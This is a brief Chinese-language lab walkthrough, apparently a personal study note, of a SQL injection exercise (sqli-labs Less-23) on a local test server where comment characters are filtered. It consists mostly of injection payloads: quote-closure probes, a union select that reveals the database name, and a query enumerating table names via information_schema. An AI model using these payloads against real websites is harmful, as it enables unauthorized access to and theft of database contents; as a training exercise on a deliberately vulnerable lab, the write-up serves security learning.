基于get的过滤了的注入
0X1测试闭合
127.0.0.1/sql1/Less-23/?id=1‘
http://127.0.0.1/sql1/Less-23/?id=1%27%27
0X02 然后就是组合拳的操作了
那么应该是’闭合 那么我们可以尝试用# 闭合 这里要url编码一次 so 我们用%23
?id=1‘ order by 1%23
但是为什么还报错
我们来看看源代码 原来这里用正则表达式过滤了 # --这两种闭合 第二种我还没有试过...哈哈
那我们只能用单引号闭合喽 因为单引号里面的不会被执行 所以我们用and 闭合
构造语句
?id=1‘ and ‘1‘=‘1
正确
?id=-1‘ union select 1,database(),3 and ‘1‘=‘1
0X01爆表名
a 爆列名
?id=-1‘ order by 100 and ‘1‘=‘1
?id=-1‘ union select 1,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),3 and ‘1‘=‘1
